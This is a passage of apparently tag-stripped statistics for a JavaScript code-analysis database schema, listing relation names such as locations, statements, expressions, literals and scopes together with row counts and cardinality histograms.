+1090 + + +@jsx_qualified_name +100 + + +@jsx_empty_expr +100 + + +@await_expr +100 + + +@function_sent_expr +100 + + +@decorator +100 + + +@bind_expr +100 + + +@bigint_literal +100 + + +@nullishcoalescing_expr +100 + + +@e4x_xml_anyname +100 + + +@e4x_xml_static_attribute_selector +100 + + +@e4x_xml_dynamic_attribute_selector +100 + + +@e4x_xml_filter_expression +100 + + +@e4x_xml_static_qualident +100 + + 
+@e4x_xml_dynamic_qualident +100 + + +@e4x_xml_dotdotexpr +100 + + +@xmldtd +1 + + +@xmlelement +1270313 + + +@xmlattribute +1202020 + + +@xmlnamespace +4185 + + +@xmlcomment +26812 + + +@xmlcharacters +439958 + + +@optionalchainable +100 + + +@nullishcoalescing_expr +100 + + +@config +69795 + + +@configName +69794 + + +@configValue +69691 + + + + + +locations_default +id +15664049 + + +id +15664049 + + +file +6457 + + +beginLine +277405 + + +beginColumn +117878 + + +endLine +277405 + + +endColumn +117868 + + + + +id +file + + +12 + + +1 +2 +15664049 + + + + + + +id +beginLine + + +12 + + +1 +2 +15664049 + + + + + + +id +beginColumn + + +12 + + +1 +2 +15664049 + + + + + + +id +endLine + + +12 + + +1 +2 +15664049 + + + + + + +id +endColumn + + +12 + + +1 +2 +15664049 + + + + + + +file +id + + +12 + + +1 +2 +674 + + +2 +28 +501 + + +28 +105 +488 + + +105 +211 +488 + + +211 +335 +490 + + +335 +477 +485 + + +477 +637 +488 + + +637 +856 +486 + + +856 +1141 +485 + + +1141 +1602 +485 + + +1604 +2336 +486 + + +2336 +4472 +485 + + +4472 +2368854 +416 + + + + + + +file +beginLine + + +12 + + +1 +2 +674 + + +2 +13 +509 + + +13 +23 +513 + + +23 +35 +516 + + +35 +50 +504 + + +50 +69 +506 + + +69 +92 +489 + + +92 +124 +504 + + +124 +165 +487 + + +165 +230 +490 + + +230 +357 +491 + + +357 +737 +485 + + +737 +277406 +289 + + + + + + +file +beginColumn + + +12 + + +1 +2 +674 + + +2 +12 +491 + + +12 +32 +495 + + +32 +46 +510 + + +46 +56 +498 + + +56 +62 +488 + + +62 +67 +500 + + +67 +71 +477 + + +71 +75 +583 + + +75 +78 +497 + + +78 +80 +403 + + +80 +82 +543 + + +82 +117856 +298 + + + + + + +file +endLine + + +12 + + +1 +2 +674 + + +2 +13 +509 + + +13 +23 +509 + + +23 +35 +520 + + +35 +50 +504 + + +50 +69 +506 + + +69 +92 +489 + + +92 +124 +504 + + +124 +165 +487 + + +165 +230 +490 + + +230 +357 +491 + + +357 +737 +485 + + +737 +277406 +289 + + + + + + +file +endColumn + + +12 + + +1 +2 +682 + + +2 +18 +501 + + +18 +36 +487 + + +36 +51 +513 + + +51 +61 +532 + + +61 +67 +508 + + +67 
+72 +568 + + +72 +75 +444 + + +75 +78 +514 + + +78 +80 +484 + + +80 +81 +283 + + +81 +82 +579 + + +82 +117837 +362 + + + + + + +beginLine +id + + +12 + + +1 +6 +666 + + +7 +8 +116499 + + +8 +14 +19181 + + +14 +15 +29298 + + +15 +19 +25329 + + +19 +24 +17273 + + +24 +29 +22410 + + +29 +56 +21150 + + +56 +242 +20830 + + +242 +134468 +4769 + + + + + + +beginLine +file + + +12 + + +1 +2 +117975 + + +2 +3 +120803 + + +3 +8 +21079 + + +8 +6458 +17548 + + + + + + +beginLine +beginColumn + + +12 + + +1 +5 +667 + + +5 +6 +116499 + + +6 +11 +19126 + + +11 +12 +32612 + + +12 +15 +18313 + + +15 +17 +18964 + + +17 +21 +21845 + + +21 +31 +21197 + + +31 +64 +20988 + + +64 +94454 +7194 + + + + + + +beginLine +endLine + + +12 + + +1 +2 +238980 + + +2 +3 +22312 + + +3 +890 +16113 + + + + + + +beginLine +endColumn + + +12 + + +1 +5 +667 + + +5 +6 +116499 + + +6 +12 +20939 + + +12 +13 +28687 + + +13 +16 +19707 + + +16 +18 +20057 + + +18 +22 +21035 + + +22 +33 +21605 + + +33 +69 +21089 + + +69 +94455 +7120 + + + + + + +beginColumn +id + + +12 + + +1 +2 +5117 + + +2 +3 +9246 + + +3 +4 +13440 + + +4 +5 +15857 + + +5 +6 +13813 + + +6 +7 +11696 + + +7 +8 +8777 + + +8 +9 +6887 + + +9 +11 +9723 + + +11 +14 +10392 + + +14 +20 +9364 + + +20 +2248970 +3566 + + + + + + +beginColumn +file + + +12 + + +1 +2 +68610 + + +2 +3 +15842 + + +3 +4 +7965 + + +4 +5 +9221 + + +5 +6 +8014 + + +6 +6458 +8226 + + + + + + +beginColumn +beginLine + + +12 + + +1 +2 +6868 + + +2 +3 +15317 + + +3 +4 +24725 + + +4 +5 +25386 + + +5 +6 +10178 + + +6 +7 +6239 + + +7 +9 +10825 + + +9 +11 +9294 + + +11 +1255 +8841 + + +1258 +277405 +205 + + + + + + +beginColumn +endLine + + +12 + + +1 +2 +6868 + + +2 +3 +15317 + + +3 +4 +24725 + + +4 +5 +25386 + + +5 +6 +10175 + + +6 +7 +6232 + + +7 +9 +10827 + + +9 +11 +9299 + + +11 +1227 +8842 + + +1256 +277405 +207 + + + + + + +beginColumn +endColumn + + +12 + + +1 +2 +24039 + + +2 +3 +21662 + + +3 +4 +22809 + + +4 +5 +17118 + + +5 +6 +12038 + + +6 +7 +7768 + + +7 +10 +9297 + + +10 
+1064 +3147 + + + + + + +endLine +id + + +12 + + +1 +6 +666 + + +7 +8 +116499 + + +8 +14 +18715 + + +14 +15 +30262 + + +15 +19 +24946 + + +19 +24 +17066 + + +24 +29 +22451 + + +29 +56 +21060 + + +56 +237 +20821 + + +237 +134470 +4919 + + + + + + +endLine +file + + +12 + + +1 +2 +117975 + + +2 +3 +120803 + + +3 +8 +21076 + + +8 +6458 +17551 + + + + + + +endLine +beginLine + + +12 + + +1 +2 +243883 + + +2 +4 +23431 + + +4 +71 +10091 + + + + + + +endLine +beginColumn + + +12 + + +1 +5 +667 + + +5 +6 +116499 + + +6 +11 +19057 + + +11 +12 +32046 + + +12 +15 +18779 + + +15 +17 +18710 + + +17 +21 +21785 + + +21 +31 +21103 + + +31 +63 +20930 + + +63 +94454 +7829 + + + + + + +endLine +endColumn + + +12 + + +1 +5 +667 + + +5 +6 +116499 + + +6 +12 +21177 + + +12 +13 +28718 + + +13 +16 +19585 + + +16 +18 +21210 + + +18 +23 +23344 + + +23 +35 +21013 + + +35 +80 +20938 + + +80 +94454 +4254 + + + + + + +endColumn +id + + +12 + + +1 +2 +4439 + + +2 +3 +8489 + + +3 +4 +12884 + + +4 +5 +16048 + + +5 +6 +15554 + + +6 +7 +12546 + + +7 +8 +9231 + + +8 +9 +6405 + + +9 +11 +9266 + + +11 +14 +10367 + + +14 +20 +9186 + + +20 +489713 +3453 + + + + + + +endColumn +file + + +12 + + +1 +2 +68569 + + +2 +3 +15919 + + +3 +4 +7876 + + +4 +5 +9221 + + +5 +6 +8062 + + +6 +6458 +8221 + + + + + + +endColumn +beginLine + + +12 + + +1 +2 +6848 + + +2 +3 +15273 + + +3 +4 +24807 + + +4 +5 +25343 + + +5 +6 +10180 + + +6 +7 +6269 + + +7 +9 +10857 + + +9 +11 +9251 + + +11 +1768 +8841 + + +1780 +212575 +199 + + + + + + +endColumn +beginColumn + + +12 + + +1 +2 +15842 + + +2 +3 +27460 + + +3 +4 +26707 + + +4 +5 +18639 + + +5 +6 +11518 + + +6 +8 +10766 + + +8 +265 +6936 + + + + + + +endColumn +endLine + + +12 + + +1 +2 +6850 + + +2 +3 +15271 + + +3 +4 +24807 + + +4 +5 +25343 + + +5 +6 +10180 + + +6 +7 +6269 + + +7 +9 +10858 + + +9 +11 +9252 + + +11 +1789 +8841 + + +1795 +212360 +197 + + + + + + + + +numlines +122044 + + +element_id +122044 + + +num_lines +1136 + + +num_code +939 + + +num_comment +418 + + + + 
+element_id +num_lines + + +12 + + +1 +2 +122044 + + + + + + +element_id +num_code + + +12 + + +1 +2 +122044 + + + + + + +element_id +num_comment + + +12 + + +1 +2 +122044 + + + + + + +num_lines +element_id + + +12 + + +1 +2 +399 + + +2 +3 +144 + + +3 +4 +97 + + +4 +6 +91 + + +6 +9 +86 + + +9 +15 +90 + + +15 +36 +86 + + +36 +174 +86 + + +175 +21589 +57 + + + + + + +num_lines +num_code + + +12 + + +1 +2 +444 + + +2 +3 +140 + + +3 +4 +95 + + +4 +6 +87 + + +6 +9 +85 + + +9 +14 +88 + + +14 +24 +90 + + +24 +33 +89 + + +33 +38 +18 + + + + + + +num_lines +num_comment + + +12 + + +1 +2 +444 + + +2 +3 +140 + + +3 +4 +94 + + +4 +6 +92 + + +6 +9 +90 + + +9 +14 +90 + + +14 +20 +89 + + +20 +27 +89 + + +27 +30 +8 + + + + + + +num_code +element_id + + +12 + + +1 +2 +317 + + +2 +3 +125 + + +3 +4 +67 + + +4 +5 +61 + + +5 +8 +67 + + +8 +12 +73 + + +12 +26 +72 + + +26 +69 +71 + + +69 +1540 +71 + + +1747 +22000 +15 + + + + + + +num_code +num_lines + + +12 + + +1 +2 +349 + + +2 +3 +118 + + +3 +4 +77 + + +4 +6 +76 + + +6 +10 +84 + + +10 +19 +78 + + +19 +31 +79 + + +31 +44 +73 + + +44 +52 +5 + + + + + + +num_code +num_comment + + +12 + + +1 +2 +347 + + +2 +3 +121 + + +3 +4 +79 + + +4 +6 +74 + + +6 +9 +74 + + +9 +16 +80 + + +16 +23 +72 + + +23 +31 +76 + + +31 +40 +16 + + + + + + +num_comment +element_id + + +12 + + +1 +2 +147 + + +2 +3 +67 + + +3 +4 +26 + + +4 +5 +26 + + +5 +7 +32 + + +7 +12 +34 + + +12 +32 +34 + + +33 +135 +32 + + +150 +93795 +20 + + + + + + +num_comment +num_lines + + +12 + + +1 +2 +171 + + +2 +3 +57 + + +3 +4 +32 + + +4 +5 +24 + + +5 +8 +33 + + +8 +18 +35 + + +19 +47 +32 + + +52 +253 +33 + + +362 +363 +1 + + + + + + +num_comment +num_code + + +12 + + +1 +2 +174 + + +2 +3 +54 + + +3 +4 +33 + + +4 +5 +22 + + +5 +8 +33 + + +8 +18 +36 + + +19 +47 +32 + + +51 +230 +32 + + +232 +346 +2 + + + + + + + + +files +id +6457 + + +id +6457 + + +name +6457 + + + + +id +name + + +12 + + +1 +2 +6457 + + + + + + +name +id + + +12 + + +1 +2 +6457 + + + + + + + + +folders +id +1590 + + 
+id +1590 + + +name +1590 + + + + +id +name + + +12 + + +1 +2 +1590 + + + + + + +name +id + + +12 + + +1 +2 +1590 + + + + + + + + +containerparent +child +8046 + + +parent +1590 + + +child +8046 + + + + +parent +child + + +12 + + +1 +2 +525 + + +2 +3 +326 + + +3 +4 +207 + + +4 +5 +128 + + +5 +7 +138 + + +7 +11 +132 + + +11 +53 +120 + + +60 +335 +14 + + + + + + +child +parent + + +12 + + +1 +2 +8046 + + + + + + + + +externalData +5684 + + +id +950 + + +path +3 + + +column +6 + + +value +790 + + + + +id +path + + +12 + + +1 +2 +950 + + + + + + +id +column + + +12 + + +2 +3 +4 + + +6 +7 +946 + + + + + + +id +value + + +12 + + +2 +6 +8 + + +6 +7 +942 + + + + + + +path +id + + +12 + + +4 +5 +1 + + +72 +73 +1 + + +874 +875 +1 + + + + + + +path +column + + +12 + + +2 +3 +1 + + +6 +7 +2 + + + + + + +path +value + + +12 + + +8 +9 +1 + + +86 +87 +1 + + +722 +723 +1 + + + + + + +column +id + + +12 + + +946 +947 +4 + + +950 +951 +2 + + + + + + +column +path + + +12 + + +2 +3 +4 + + +3 +4 +2 + + + + + + +column +value + + +12 + + +2 +3 +1 + + +6 +7 +1 + + +31 +32 +1 + + +93 +94 +1 + + +117 +118 +1 + + +620 +621 +1 + + + + + + +value +id + + +12 + + +1 +2 +478 + + +2 +3 +132 + + +3 +5 +69 + + +5 +16 +61 + + +16 +928 +50 + + + + + + +value +path + + +12 + + +1 +2 +764 + + +2 +3 +26 + + + + + + +value +column + + +12 + + +1 +2 +711 + + +2 +3 +79 + + + + + + + + +sourceLocationPrefix +1 + + +prefix +1 + + + + + +toplevels +id +5320 + + +id +5320 + + +kind +4 + + + + +id +kind + + +12 + + +1 +2 +5320 + + + + + + +kind +id + + +12 + + +3 +4 +1 + + +31 +32 +1 + + +86 +87 +1 + + +5200 +5201 +1 + + + + + + + + +is_externs +44 + + +toplevel +44 + + + + + +is_instantiated +5 + + +decl +5 + + + + + +has_declare_keyword +66 + + +stmt +66 + + + + + +has_asserts_keyword +66 + + +node +66 + + + + + +is_abstract_member +66 + + +id +66 + + + + + +has_public_keyword +9297 + + +id +9297 + + + + + +has_private_keyword +11391 + + +id +11391 + + + + + +has_protected_keyword +1048 + + +id +1048 + + + 
+ + +has_readonly_keyword +2338 + + +id +2338 + + + + + +has_type_keyword +1000 + + +id +1000 + + + + + +is_optional_member +3668 + + +id +3668 + + + + + +has_definite_assignment_assertion +100 + + +id +100 + + + + + +is_optional_parameter_declaration +3966 + + +parameter +3966 + + + + + +parameter_fields +2693 + + +field +2693 + + +constructor +1020 + + +param_index +20 + + + + +field +constructor + + +12 + + +1 +2 +2693 + + + + + + +field +param_index + + +12 + + +1 +2 +2693 + + + + + + +constructor +field + + +12 + + +1 +2 +439 + + +2 +3 +233 + + +3 +4 +118 + + +4 +5 +78 + + +5 +7 +83 + + +7 +21 +69 + + + + + + +constructor +param_index + + +12 + + +1 +2 +439 + + +2 +3 +233 + + +3 +4 +118 + + +4 +5 +78 + + +5 +7 +83 + + +7 +21 +69 + + + + + + +param_index +field + + +12 + + +1 +2 +1 + + +2 +3 +1 + + +3 +4 +1 + + +4 +5 +1 + + +5 +6 +1 + + +6 +7 +1 + + +8 +9 +1 + + +10 +11 +1 + + +15 +16 +1 + + +22 +23 +1 + + +29 +30 +1 + + +36 +37 +1 + + +48 +49 +1 + + +69 +70 +1 + + +104 +105 +1 + + +152 +153 +1 + + +230 +231 +1 + + +348 +349 +1 + + +581 +582 +1 + + +1020 +1021 +1 + + + + + + +param_index +constructor + + +12 + + +1 +2 +1 + + +2 +3 +1 + + +3 +4 +1 + + +4 +5 +1 + + +5 +6 +1 + + +6 +7 +1 + + +8 +9 +1 + + +10 +11 +1 + + +15 +16 +1 + + +22 +23 +1 + + +29 +30 +1 + + +36 +37 +1 + + +48 +49 +1 + + +69 +70 +1 + + +104 +105 +1 + + +152 +153 +1 + + +230 +231 +1 + + +348 +349 +1 + + +581 +582 +1 + + +1020 +1021 +1 + + + + + + + + +is_const_enum +62 + + +id +62 + + + + + +is_abstract_class +116 + + +id +116 + + + + + +typeexprs +54050 + + +id +54050 + + +kind +6 + + +parent +29264 + + +idx +26 + + +tostring +3278 + + + + +id +kind + + +12 + + +1 +2 +54050 + + + + + + +id +parent + + +12 + + +1 +2 +54050 + + + + + + +id +idx + + +12 + + +1 +2 +54050 + + + + + + +id +tostring + + +12 + + +1 +2 +54050 + + + + + + +kind +id + + +12 + + +3 +4 +1 + + +4 +5 +1 + + +733 +734 +1 + + +2513 +2514 +1 + + +25306 +25307 +1 + + +25491 +25492 +1 + + + + + + +kind +parent + + +12 + + +3 +4 
+1 + + +4 +5 +1 + + +733 +734 +1 + + +2513 +2514 +1 + + +16661 +16662 +1 + + +17601 +17602 +1 + + + + + + +kind +idx + + +12 + + +1 +2 +2 + + +3 +4 +1 + + +4 +5 +1 + + +19 +20 +1 + + +25 +26 +1 + + + + + + +kind +tostring + + +12 + + +2 +3 +1 + + +3 +4 +1 + + +9 +10 +1 + + +242 +243 +1 + + +2075 +2076 +1 + + +2322 +2323 +1 + + + + + + +parent +id + + +12 + + +1 +2 +15321 + + +2 +3 +7887 + + +3 +4 +3725 + + +4 +9 +2229 + + +9 +24 +102 + + + + + + +parent +kind + + +12 + + +1 +2 +21285 + + +2 +3 +7707 + + +3 +4 +272 + + + + + + +parent +idx + + +12 + + +1 +2 +15321 + + +2 +3 +7887 + + +3 +4 +3725 + + +4 +9 +2229 + + +9 +24 +102 + + + + + + +parent +tostring + + +12 + + +1 +2 +16315 + + +2 +3 +8432 + + +3 +4 +3126 + + +4 +22 +1391 + + + + + + +idx +id + + +12 + + +1 +2 +2 + + +3 +4 +2 + + +4 +7 +2 + + +10 +12 +2 + + +13 +22 +2 + + +27 +38 +2 + + +54 +61 +2 + + +101 +212 +2 + + +356 +530 +2 + + +859 +1645 +2 + + +2513 +2519 +2 + + +3330 +7198 +2 + + +15305 +19237 +2 + + + + + + +idx +kind + + +12 + + +1 +2 +7 + + +2 +3 +14 + + +3 +4 +2 + + +4 +5 +3 + + + + + + +idx +parent + + +12 + + +1 +2 +2 + + +3 +4 +2 + + +4 +7 +2 + + +10 +12 +2 + + +13 +22 +2 + + +27 +38 +2 + + +54 +61 +2 + + +101 +212 +2 + + +356 +530 +2 + + +859 +1645 +2 + + +2513 +2519 +2 + + +3330 +7198 +2 + + +15305 +19237 +2 + + + + + + +idx +tostring + + +12 + + +1 +2 +2 + + +3 +4 +2 + + +4 +6 +2 + + +9 +10 +2 + + +12 +17 +2 + + +18 +26 +2 + + +28 +31 +2 + + +37 +44 +2 + + +60 +71 +2 + + +108 +196 +2 + + +395 +667 +2 + + +746 +978 +2 + + +1522 +2076 +2 + + + + + + +tostring +id + + +12 + + +1 +2 +1085 + + +2 +3 +627 + + +3 +4 +344 + + +4 +5 +322 + + +5 +7 +292 + + +7 +12 +260 + + +12 +45 +247 + + +45 +7788 +101 + + + + + + +tostring +kind + + +12 + + +1 +2 +1903 + + +2 +3 +1375 + + + + + + +tostring +parent + + +12 + + +1 +2 +1097 + + +2 +3 +631 + + +3 +4 +341 + + +4 +5 +327 + + +5 +7 +292 + + +7 +12 +253 + + +12 +48 +246 + + +48 +6190 +91 + + + + + + +tostring +idx + + +12 + + +1 +2 +1450 + + +2 +3 +939 + 
+ +3 +4 +481 + + +4 +6 +289 + + +6 +19 +119 + + + + + + + + +is_for_await_of +1 + + +forof +1 + + + + + +is_module +21 + + +tl +21 + + + + + +is_es2015_module +21 + + +tl +21 + + + + + +is_closure_module +21 + + +tl +21 + + + + + +toplevel_parent_xml_node +43 + + +toplevel +43 + + +xmlnode +43 + + + + +toplevel +xmlnode + + +12 + + +1 +2 +43 + + + + + + +xmlnode +toplevel + + +12 + + +1 +2 +43 + + + + + + + + +xml_element_parent_expression +1 + + +xmlnode +1 + + +expression +1 + + +index +1 + + + + +xmlnode +expression + + +12 + + +1 +2 +1 + + + + + + +xmlnode +index + + +12 + + +1 +2 +1 + + + + + + +expression +xmlnode + + +12 + + +1 +2 +1 + + + + + + +expression +index + + +12 + + +1 +2 +1 + + + + + + +index +xmlnode + + +12 + + +1 +2 +1 + + + + + + +index +expression + + +12 + + +1 +2 +1 + + + + + + + + +is_nodejs +12 + + +tl +12 + + + + + +stmts +id +1096691 + + +id +1096691 + + +kind +31 + + +parent +412140 + + +idx +152947 + + +tostring +284956 + + + + +id +kind + + +12 + + +1 +2 +1096691 + + + + + + +id +parent + + +12 + + +1 +2 +1096691 + + + + + + +id +idx + + +12 + + +1 +2 +1096691 + + + + + + +id +tostring + + +12 + + +1 +2 +1096691 + + + + + + +kind +id + + +12 + + +1 +2 +3 + + +3 +5 +2 + + +5 +9 +2 + + +31 +42 +2 + + +61 +552 +2 + + +1118 +1137 +2 + + +1272 +1316 +2 + + +1316 +1379 +2 + + +1471 +1570 +2 + + +1642 +2306 +2 + + +3120 +5386 +2 + + +8674 +10150 +2 + + +16771 +48210 +2 + + +68214 +105607 +2 + + +204994 +610341 +2 + + + + + + +kind +parent + + +12 + + +1 +2 +4 + + +3 +5 +2 + + +5 +6 +2 + + +35 +59 +2 + + +298 +424 +2 + + +738 +1157 +2 + + +1253 +1263 +2 + + +1271 +1321 +2 + + +1495 +1568 +2 + + +1642 +2306 +2 + + +2999 +4416 +2 + + +4734 +10123 +2 + + +48139 +48347 +2 + + +50857 +162082 +2 + + +191077 +191078 +1 + + + + + + +kind +idx + + +12 + + +1 +2 +3 + + +2 +3 +2 + + +3 +4 +2 + + +8 +9 +2 + + +10 +12 +2 + + +16 +22 +2 + + +28 +32 +2 + + +36 +37 +2 + + +39 +51 +2 + + +54 +63 +2 + + +65 +67 +2 + + +116 +118 +2 + + +122 +138 +2 + + +251 
+1564 +2 + + +1967 +152946 +2 + + + + + + +kind +tostring + + +12 + + +1 +2 +5 + + +2 +3 +2 + + +4 +11 +2 + + +12 +17 +2 + + +88 +104 +2 + + +147 +168 +2 + + +239 +296 +2 + + +356 +428 +2 + + +591 +705 +2 + + +811 +829 +2 + + +1092 +2254 +2 + + +2665 +10292 +2 + + +18023 +21916 +2 + + +43911 +180066 +2 + + + + + + +parent +id + + +12 + + +1 +2 +265890 + + +2 +3 +69435 + + +3 +4 +25109 + + +4 +8 +34966 + + +8 +152946 +16740 + + + + + + +parent +kind + + +12 + + +1 +2 +319546 + + +2 +3 +67918 + + +3 +23 +24676 + + + + + + +parent +idx + + +12 + + +1 +2 +265890 + + +2 +3 +69435 + + +3 +4 +25109 + + +4 +8 +34966 + + +8 +152946 +16740 + + + + + + +parent +tostring + + +12 + + +1 +2 +275359 + + +2 +3 +62818 + + +3 +4 +25781 + + +4 +8 +34293 + + +8 +19511 +13889 + + + + + + +idx +id + + +12 + + +1 +2 +149939 + + +2 +220361 +3008 + + + + + + +idx +kind + + +12 + + +1 +2 +149940 + + +2 +28 +3007 + + + + + + +idx +parent + + +12 + + +1 +2 +149939 + + +2 +220361 +3008 + + + + + + +idx +tostring + + +12 + + +1 +2 +149939 + + +2 +88922 +3008 + + + + + + +tostring +id + + +12 + + +1 +2 +186537 + + +2 +3 +48494 + + +3 +5 +24651 + + +5 +37 +21526 + + +37 +72175 +3748 + + + + + + +tostring +kind + + +12 + + +1 +2 +284895 + + +2 +4 +61 + + + + + + +tostring +parent + + +12 + + +1 +2 +195596 + + +2 +3 +45562 + + +3 +5 +23127 + + +5 +66340 +20671 + + + + + + +tostring +idx + + +12 + + +1 +2 +225945 + + +2 +3 +33948 + + +3 +13 +21496 + + +13 +903 +3567 + + + + + + + + +stmt_containers +1096691 + + +stmt +1096691 + + +container +120740 + + + + +stmt +container + + +12 + + +1 +2 +1096691 + + + + + + +container +stmt + + +12 + + +1 +2 +6778 + + +2 +3 +35010 + + +3 +4 +16178 + + +4 +5 +12184 + + +5 +6 +9476 + + +6 +7 +7569 + + +7 +9 +10084 + + +9 +13 +10057 + + +13 +27 +9196 + + +27 +152947 +4208 + + + + + + + + +jump_targets +11791 + + +jump +11791 + + +target +4873 + + + + +jump +target + + +12 + + +1 +2 +11791 + + + + + + +target +jump + + +12 + + +1 +2 +2542 + + +2 +3 +1106 + + +3 +4 
+505 + + +4 +6 +410 + + +6 +260 +310 + + + + + + + + +exprs +id +5495305 + + +id +5495305 + + +kind +85 + + +parent +3130204 + + +idx +17698 + + +tostring +834491 + + + + +id +kind + + +12 + + +1 +2 +5495305 + + + + + + +id +parent + + +12 + + +1 +2 +5495305 + + + + + + +id +idx + + +12 + + +1 +2 +5495305 + + + + + + +id +tostring + + +12 + + +1 +2 +5495305 + + + + + + +kind +id + + +12 + + +1 +4 +7 + + +4 +45 +7 + + +50 +97 +7 + + +108 +458 +7 + + +503 +824 +7 + + +1135 +2497 +7 + + +2527 +5439 +7 + + +5655 +10255 +7 + + +10789 +15893 +7 + + +17758 +42854 +7 + + +50958 +130844 +7 + + +245084 +722374 +7 + + +1295408 +1295409 +1 + + + + + + +kind +parent + + +12 + + +1 +3 +7 + + +3 +45 +7 + + +47 +93 +7 + + +106 +407 +7 + + +457 +809 +7 + + +1108 +2420 +7 + + +2502 +5349 +7 + + +5453 +10133 +7 + + +10658 +15697 +7 + + +16273 +36888 +7 + + +41849 +128642 +7 + + +199566 +722374 +7 + + +1171898 +1171899 +1 + + + + + + +kind +idx + + +12 + + +1 +2 +7 + + +2 +3 +12 + + +3 +4 +11 + + +4 +5 +7 + + +5 +6 +7 + + +6 +7 +3 + + +7 +8 +7 + + +8 +11 +6 + + +12 +18 +7 + + +20 +64 +7 + + +82 +395 +7 + + +431 +13375 +4 + + + + + + +kind +tostring + + +12 + + +1 +2 +7 + + +2 +6 +7 + + +8 +37 +7 + + +38 +126 +7 + + +142 +304 +7 + + +358 +721 +7 + + +811 +1485 +7 + + +1523 +2918 +7 + + +3305 +5078 +7 + + +5422 +9940 +7 + + +10536 +40606 +7 + + +46227 +123090 +7 + + +128754 +128755 +1 + + + + + + +parent +id + + +12 + + +1 +2 +1100280 + + +2 +3 +1876078 + + +3 +17692 +153846 + + + + + + +parent +kind + + +12 + + +1 +2 +1300246 + + +2 +3 +1747609 + + +3 +8 +82349 + + + + + + +parent +idx + + +12 + + +1 +2 +1100280 + + +2 +3 +1876078 + + +3 +17692 +153846 + + + + + + +parent +tostring + + +12 + + +1 +2 +1108803 + + +2 +3 +1870864 + + +3 +17526 +150537 + + + + + + +idx +id + + +12 + + +1 +2 +4092 + + +2 +3 +1365 + + +3 +4 +1995 + + +4 +5 +283 + + +5 +6 +1681 + + +6 +7 +5909 + + +7 +10 +1344 + + +10 +3049605 +1029 + + + + + + +idx +kind + + +12 + + +1 +2 +10648 + + +2 +3 +6398 + + +3 +83 
+652 + + + + + + +idx +parent + + +12 + + +1 +2 +4092 + + +2 +3 +1365 + + +3 +4 +1995 + + +4 +5 +283 + + +5 +6 +1681 + + +6 +7 +5909 + + +7 +10 +1344 + + +10 +3049605 +1029 + + + + + + +idx +tostring + + +12 + + +1 +2 +4093 + + +2 +3 +1365 + + +3 +4 +2014 + + +4 +5 +1147 + + +5 +6 +1529 + + +6 +7 +5401 + + +7 +10 +1499 + + +10 +573348 +650 + + + + + + +tostring +id + + +12 + + +1 +2 +466570 + + +2 +3 +157949 + + +3 +4 +55443 + + +4 +6 +61411 + + +6 +17 +63412 + + +17 +128652 +29706 + + + + + + +tostring +kind + + +12 + + +1 +2 +772624 + + +2 +24 +61867 + + + + + + +tostring +parent + + +12 + + +1 +2 +467110 + + +2 +3 +158201 + + +3 +4 +55446 + + +4 +6 +61061 + + +6 +17 +63168 + + +17 +128642 +29505 + + + + + + +tostring +idx + + +12 + + +1 +2 +724438 + + +2 +3 +86524 + + +3 +7765 +23529 + + + + + + + + +literals +expr +3145090 + + +value +216517 + + +raw +234110 + + +expr +3145090 + + + + +value +raw + + +12 + + +1 +2 +201221 + + +2 +25 +15296 + + + + + + +value +expr + + +12 + + +1 +2 +95821 + + +2 +3 +41222 + + +3 +4 +19627 + + +4 +5 +16097 + + +5 +9 +18825 + + +9 +31 +16474 + + +31 +122435 +8451 + + + + + + +raw +value + + +12 + + +1 +2 +234110 + + + + + + +raw +expr + + +12 + + +1 +2 +104635 + + +2 +3 +47230 + + +3 +4 +20082 + + +4 +5 +16835 + + +5 +9 +19610 + + +9 +34 +17695 + + +34 +120241 +8023 + + + + + + +expr +value + + +12 + + +1 +2 +3145090 + + + + + + +expr +raw + + +12 + + +1 +2 +3145090 + + + + + + + + +enclosing_stmt +5372899 + + +expr +5372899 + + +stmt +854574 + + + + +expr +stmt + + +12 + + +1 +2 +5372899 + + + + + + +stmt +expr + + +12 + + +1 +3 +74578 + + +3 +4 +254844 + + +4 +5 +57228 + + +5 +6 +136234 + + +6 +7 +44557 + + +7 +8 +79401 + + +8 +9 +55420 + + +9 +11 +63155 + + +11 +17 +65146 + + +17 +88321 +24011 + + + + + + + + +expr_containers +5495305 + + +expr +5495305 + + +container +118511 + + + + +expr +container + + +12 + + +1 +2 +5495305 + + + + + + +container +expr + + +12 + + +1 +4 +7197 + + +4 +6 +9110 + + +6 +8 +9222 + + +8 +10 +8424 
+ + +10 +13 +10651 + + +13 +16 +8706 + + +16 +20 +9358 + + +20 +25 +9955 + + +25 +31 +8893 + + +31 +40 +9356 + + +40 +54 +9017 + + +54 +85 +8935 + + +85 +484 +8890 + + +484 +459128 +797 + + + + + + + + +array_size +28188 + + +ae +28188 + + +sz +118 + + + + +ae +sz + + +12 + + +1 +2 +28188 + + + + + + +sz +ae + + +12 + + +1 +2 +52 + + +2 +3 +21 + + +3 +5 +9 + + +5 +8 +9 + + +9 +20 +9 + + +22 +181 +9 + + +231 +12345 +9 + + + + + + + + +is_delegating +4 + + +yield +4 + + + + + +expr_contains_template_tag_location +31 + + +expr +31 + + +location +31 + + + + +expr +location + + +12 + + +1 +2 +31 + + + + + + +location +expr + + +12 + + +1 +2 +31 + + + + + + + + +template_placeholder_tag_info +283 + + +node +283 + + +parentNode +92 + + +raw +24 + + + + +node +parentNode + + +12 + + +1 +2 +283 + + + + + + +node +raw + + +12 + + +1 +2 +283 + + + + + + +parentNode +node + + +12 + + +1 +2 +49 + + +2 +3 +4 + + +3 +4 +9 + + +5 +6 +9 + + +6 +7 +4 + + +7 +8 +13 + + +9 +11 +4 + + + + + + +parentNode +raw + + +12 + + +1 +2 +49 + + +2 +3 +4 + + +3 +4 +9 + + +4 +5 +11 + + +5 +6 +13 + + +6 +11 +6 + + + + + + +raw +node + + +12 + + +1 +2 +2 + + +2 +3 +4 + + +3 +4 +9 + + +4 +6 +2 + + +16 +17 +2 + + +20 +26 +2 + + +34 +45 +2 + + +82 +83 +1 + + + + + + +raw +parentNode + + +12 + + +1 +2 +2 + + +2 +3 +4 + + +3 +4 +9 + + +4 +6 +2 + + +16 +17 +2 + + +20 +26 +2 + + +34 +41 +2 + + +44 +45 +1 + + + + + + + + +scopes +id +118172 + + +id +118172 + + +kind +8 + + + + +id +kind + + +12 + + +1 +2 +118172 + + + + + + +kind +id + + +12 + + +1 +2 +1 + + +4 +5 +1 + + +17 +18 +1 + + +21 +22 +1 + + +28 +29 +1 + + +584 +585 +1 + + +1272 +1273 +1 + + +116245 +116246 +1 + + + + + + + + +scopenodes +118171 + + +node +118171 + + +scope +118171 + + + + +node +scope + + +12 + + +1 +2 +118171 + + + + + + +scope +node + + +12 + + +1 +2 +118171 + + + + + + + + 